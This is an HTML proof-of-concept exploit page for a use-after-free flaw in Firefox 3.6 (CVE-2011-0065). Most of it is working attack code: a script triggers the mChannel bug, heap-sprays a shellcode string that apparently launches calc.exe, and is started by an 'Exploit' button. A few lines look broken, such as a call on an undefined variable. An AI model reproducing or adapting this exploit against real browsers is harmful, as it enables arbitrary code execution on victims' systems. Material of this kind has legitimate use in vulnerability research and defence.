<!--
Exploit Author: Juan Sacco
Name: Mozilla Firefox 3.6 mChannel ( Universal )
Description: Mozilla Firefox 3.6 is prone to an use-after-free
vulnerability in OBJECT mChannel that allows an attacker to execute
arbitrary code.
Tested on Windows XP SP3
CVE: 2011-0065
-->
<
html
>
<
head
>
</
head
>
<
body
>
<
pre
>
# Title: Firefox 3.6 ( Universal )
</
pre
>
<
object
id
=
"exploit"
></
object
>
<
script
>
function exploit() {
var foo=document.getElementById("exploit");
e.QueryInterface(Components.interfaces.nsIChannelEventSink).onChannelRedirect(null,new
Object,0);
var vftable = unescape("\x00% u0c10");
var shellcode =
unescape("%u0004%u0c10%uBCBB%u68F1%u0105%u0106%uBE51%u6623%u0030%u0c10%u7C2A%u68F0%u5B33%u661C%u0030%u0c10%uF1DD%u68F2%u0030%u0c10%u9000%u0000%u0040%u0000%u0c0c%u0c0c%u0038%u0c10%u9090%u9090%u9090%u9090%uC781%u986D%u0007%u078B%uF505%u03F6%u9000%u9090%u056A%uC181%u008E%u0000%u9051%uF08B%uD0FF%ucccc%uEE81%u95Fa%u0004%uFF6A%uD6FF%uCCCC%u6163%u636c%u652e%u6578%u0000%ucccc");
var vtable = unescape("%u0c0c%u0c0c");
while(vtable.length <
0x10000
) {vtable += vtable;}
var
heapblock
=
shellcode
+vtable.substring(0,0x10000/2-shellcode.length*2);
while (heapblock.length<0x80000) {heapblock += shellcode+heapblock;}
var
finalspray
=
heapblock
.substring(0,0x80000 - shellcode.length -
0x24/2 - 0x4/2 - 0x2/2);
var
heapspray
=
new
Array()
for (var
i
=
0
;i<0x100;i++){
heapspray[i] = finalspray+shellcode;
}
foo.data
=
""
;}
</script>
<
input
type
=
button
value
=
"Exploit"
onclick
=
"exploit()"
/>
</
body
>
</
html
>